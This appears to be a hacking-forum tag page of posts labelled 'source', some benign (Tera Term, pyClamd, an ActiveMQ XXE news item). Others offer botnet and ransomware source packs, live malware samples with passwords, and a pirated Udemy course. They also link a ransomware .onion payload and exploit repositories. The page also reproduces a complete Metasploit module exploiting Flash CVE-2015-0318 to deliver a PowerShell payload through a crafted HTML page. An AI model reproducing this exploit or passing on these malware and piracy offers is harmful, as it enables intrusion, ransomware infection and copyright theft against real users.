Showing results for tags 'source'.
-
A small collection of bots for you. Bot Bundle 1 - ( includes over 150 bots with source code and modded versions): OSMDB-BOTNET-PACK-1.zip - Speedy Share - upload your files here Bot Bundle 2 - ( 155 bots): OSMDB-BOTNET-PACK-2.zip - Speedy Share - upload your files here Bot Bundle 3 - ( 53 bots and ransomware ): OSMDB-BOTNET-PACK-3.zip - Speedy Share - upload your files here Bot Bundle 4 - ( urxbot, Spybot, sdbot, rxbot, rbot, phatbot, litmus, gtbot, forbot, evilbot, darkirc, agobot, acebot, jbot, microbot, blueeyebot, icebot, q8bot, happybot,): OSMDB-BOTNET-PACK-4.zip - Speedy Share - upload your files here
-
leak source: How I Make $6,000+ a Month Making Apps Without Coding! - Thieves-Team udemy: https://www.udemy.com/creating-profitable-ios-and-android-apps-without-code/ download: GirlShare - Download creating-profitable-ios-and-android-apps-without-code.rar
-
source : NASA: We Are Going to Europa
-
source : https://www.dionach.com/blog/easily-grabbing-microsoft-sql-server-password-hashes
-
Dissecting the Linux/Moose malware http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdf ( PDF ) Download Source
-
https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Nivdor-A/detailed-analysis.aspx Infection vector via fake download. https://www.virustotal.com/en/url/3017aa5a0039f5eca181f56f69a29cb178eb621c0884b0380c4284a720ff7e1f/analysis/1432720854/ https://malwr.com/analysis/YzJjMjJiNDRiNWU0NDc2ODg5MzA4ODk0MWFiOGFlOWQ/ ThreatExpert Report https://www.virustotal.com/en/file/2f24ef96a1ed3ca05632f221ff17e8412728bc50b4f7c30a78528f89319b198b/analysis/1432718970/ Download infected Source
-
Meet ‘Tox': Ransomware for the Rest of Us ~ https://blogs.mcafee.com/mcafee-labs/meet-tox-ransomware-for-the-rest-of-us https://www.virustotal.com/en/file/f1384ff19a870f5aa718486666a14e88873d79eaea5725e3a2097b2d9fd9a320/analysis/1432628218/ hxxp://toxicola7qwv37qj.onion/downloads/ransom_50.00_dol_df410f19157f591860e1633b85dfb50b.scr https://malwr.com/analysis/MWExODFmZjM5YjZlNDQ5ODkxYzBkOTk1ZmMzOTcyYzI/ ThreatExpert Report https://blockchain.info/en/address/1KKGLjfDpVtNXymtTkU3PiiCpkJ532cLko Download Pass: infected Source
-
Win32k Elevation of Privilege Vulnerability. Allows code to be executed in kernel mode. Used by malware to target Windows 7. Apply MS15-051 for fix. https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html https://github.com/hfiref0x/CVE-2015-1701 Download pass: exploit Source
-
Infect files on removable disks and remote network drives. Description Virus:Win32/Ursnif VT: https://www.virustotal.com/en/file/8fa8122cfa52d7ff7fd8d918ccc9089a1762420c23edb6c50e8573456bfcdde3/analysis/1430975102/ https://www.virustotal.com/en/file/9bd91d207911b08489079c3927478b824b7948b741e1b6221339893581e4e9cb/analysis/1430976279/ Download Malware Pass: infected Source
-
mentioned in a nytimes article that schneier linked to. Two samples (prod + dev), for OSX and Win32. Does anti-vm, has some keylogging support, etc. Can't seem to attach, so here's a zippyshare link. Zippyshare.com Pass: infected https://www.virustotal.com/en/file/b27d29f30ecac80e15993fd1ba670bdcfc60f986e60d54e6a0cfb10f1c27bbc9/analysis/1430392133/ https://www.virustotal.com/en/file/48b36cedebe6d883f43b83e677449fc684f1eda4f8d63ab4eaaa3d4877389b85/analysis/1430392219/ Source
-
Reports by Eset: Unboxing Linux/Mumblehard: Muttering spam from your servers http://www.welivesecurity.com/wp-content/uploads/2015/04/mumblehard.pdf Download Source
-
Project Description: Tera Term is Tera Term Pro 2.3 succession version and is being officially recognized by the original author. Tera Term is open source free software terminal emulator supporting UTF-8 protocol. Now TTSSH supports SSH2 protocol (Original version supports SSH1). The guys at CISCO still use it. So with this little program you can connect to whatever you like: ssh, telnet, etc. Source: Tera Term Open Source Project Download: Download Files List - Tera Term - SourceForge.JP //:Edit: Version 4.86
-
Diaphora, a program diffing plugin for IDA (by joxeankoret) https://github.com/joxeankoret/diaphora Source
-
Modular Everything in the browser is a module, a web-app running in its own process. Construct your own browsing experience by selecting the right modules for you. Hackable Want vertical tabs? Write some JS & CSS! Customised autocomplete engine? JS! Every behavior is programmatic and exposed through APIs. Open source The entire technology stack is open source. Modify existing modules and you can create your own to extend the behavior of Breach. Getting Involved Homepage: Breach - A new modular Browser Mailing list: breach-dev@googlegroups.com IRC Channel: #breach on Freenode You can find a list of Modules available or under development here: List of Modules Running Breach on Linux See instructions here: Running Breach on Linux Link: https://github.com/breach/breach_core/ Source: TF
-
Source: https://github.com/SecurityObscurity/cve-2015-0313 PoC: http://www.exploit-db.com/sploits/36491.zip Adobe Flash vulnerability source code (cve-2015-0313) from Angler Exploit Kit Reference: Trend Micro Discovers New Adobe Flash Zero-Day Exploit Used in Malvertisements Malware don't need Coffee: CVE-2015-0313 (Flash up to 16.0.0.296) and Exploit Kits https://helpx.adobe.com/security/products/flash-player/apsa15-02.html Source: http://www.exploit-db.com/exploits/36491/
-
Hello, and some more of this bad stuff. Download infected Source
-
Some more of cryptolocker copycats DOWNLOAD Pass: infected Source
-
pyClamd is a python interface to Clamd (Clamav daemon). By using pyClamd, you can add virus detection capabilities to your python software in an efficient and easy way. Instead of pyClamav which uses libclamav, pyClamd may be used by a closed source product. Changes: This version is compatible with python 3 (tested with 3.2.3) and python 2 (tested 2.7.3). The API for this new version is now object oriented. Useful classes are ClamdNetworkSocket and ClamdUnixSocket. Download
-
    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = NormalRanking

      CLASSID = 'd27cdb6e-ae6d-11cf-96b8-444553540000'

      include Msf::Exploit::Powershell
      include Msf::Exploit::Remote::BrowserExploitServer

      def initialize(info={})
        super(update_info(info,
          'Name'           => "Adobe Flash Player PCRE Regex Vulnerability",
          'Description'    => %q{
            This module exploits a vulnerability found in Adobe Flash Player. A compilation logic error
            in the PCRE engine, specifically in the handling of the \c escape sequence when followed by
            a multi-byte UTF8 character, allows arbitrary execution of PCRE bytecode.
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
            [
              'Mark Brand', # Found vuln
              'sinn3r'      # MSF
            ],
          'References'     =>
            [
              [ 'CVE', '2015-0318' ],
              [ 'URL', 'http://googleprojectzero.blogspot.com/2015/02/exploitingscve-2015-0318sinsflash.html' ],
              [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=199' ]
            ],
          'Payload'        =>
            {
              'Space' => 1024,
              'DisableNops' => true
            },
          'DefaultOptions' =>
            {
              'Retries' => true
            },
          'Platform'       => 'win',
          'BrowserRequirements' =>
            {
              :source  => /script|headers/i,
              :clsid   => "{#{CLASSID}}",
              :method  => "LoadMovie",
              :os_name => OperatingSystems::Match::WINDOWS_7,
              :ua_name => Msf::HttpClients::IE,
              # Other versions are vulnerable but .235 is the one that works for me pretty well
              # So we're gonna limit to this one for now. More validation needed in the future.
              :flash   => lambda { |ver| ver == '16.0.0.235' }
            },
          'Targets'        =>
            [
              [ 'Automatic', {} ]
            ],
          'Privileged'     => false,
          'DisclosureDate' => "Nov 25 2014",
          'DefaultTarget'  => 0))
      end

      def exploit
        # Please see data/exploits/CVE-2015-0318/ for source,
        # that's where the actual exploit is
        @swf = create_swf
        super
      end

      def on_request_exploit(cli, request, target_info)
        print_status("Request: #{request.uri}")

        if request.uri =~ /\.swf$/
          print_status("Sending SWF...")
          send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
          return
        end

        print_status("Sending HTML...")
        tag = retrieve_tag(cli, request)
        profile = get_profile(tag)
        profile[:tried] = false unless profile.nil? # to allow request the swf
        send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
      end

      def exploit_template(cli, target_info)
        swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
        target_payload = get_payload(cli, target_info)
        psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
        b64_payload = Rex::Text.encode_base64(psh_payload)

        html_template = %Q|<html>
        <body>
        <object classid="clsid:#{CLASSID}" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
        <param name="movie" value="<%=swf_random%>" />
        <param name="allowScriptAccess" value="always" />
        <param name="FlashVars" value="sh=<%=b64_payload%>" />
        <param name="Play" value="true" />
        <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
        </object>
        </body>
        </html>
        |

        return html_template, binding()
      end

      def create_swf
        path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2015-0318", "Main.swf" )
        swf = ::File.open(path, 'rb') { |f| swf = f.read }

        swf
      end

    end

Source
-
Two critical bugs in the commonly used Apache ActiveMQ open source messaging and Integration Patterns server are leaving businesses open to denial-of-service (DoS) and brute force cyber attacks. Researchers at MWR InfoSecurity Labs reported identifying the bugs, warning they affect Apache ActiveMQ versions 5.0.0 to 5.10.0 and Apache ActiveMQ Apollo versions 1.0 to 1.7. The flaws reportedly stem from the way Apache ActiveMQ performs Lightweight Directory Access Protocol (LDAP) authentication. "A vulnerability was identified in ActiveMQ in the way it handles content-based subscriptions, which allows an adversary to trigger processing of XML external entities (XXE)," read the advisory. "Apache ActiveMQ Apollo, which is another MQ implementation built for reliability and performance and originally based on ActiveMQ, was also found to be affected by this vulnerability." The researchers added the flaws are dangerous as they could be exploited for a variety of purposes. "In order to successfully exploit this vulnerability, an attacker has to act on behalf of both a publisher and a consumer," read the advisory. "An attacker who is able to push and pull from a message queue can use this flaw to perform DTD-based DoS attacks, server-side request forgery or read local files, accessible to the user running the MQ broker, from the server." It is currently unclear whether hackers are actively exploiting the flaw. MWR InfoSecurity had not responded to V3's request for comment at the time of publishing. The flaw is dangerous as Apache ActiveMQ is a commonly used open source message broker service. Written in Java, Apache ActiveMQ is designed to facilitate communications between multiple clients or servers. The news follows the discovery of several critical flaws affecting other commonly used open source tools and services. Researchers reported uncovering the notorious Heartbleed flaw in April 2014.
Heartbleed is a flaw in the OpenSSL implementation of the Transport Layer Security protocol used by open source web servers such as Apache and Nginx, which host around 66 percent of all sites. In a recent interview with V3, Maarten Ectors, Canonical's vice president of next-generation networks and proximity cloud, argued the nature of open source software development means further Heartbleed-level flaws will be discovered in the very near future. Source
-
Brackets - A modern, open source code editor that understands web design.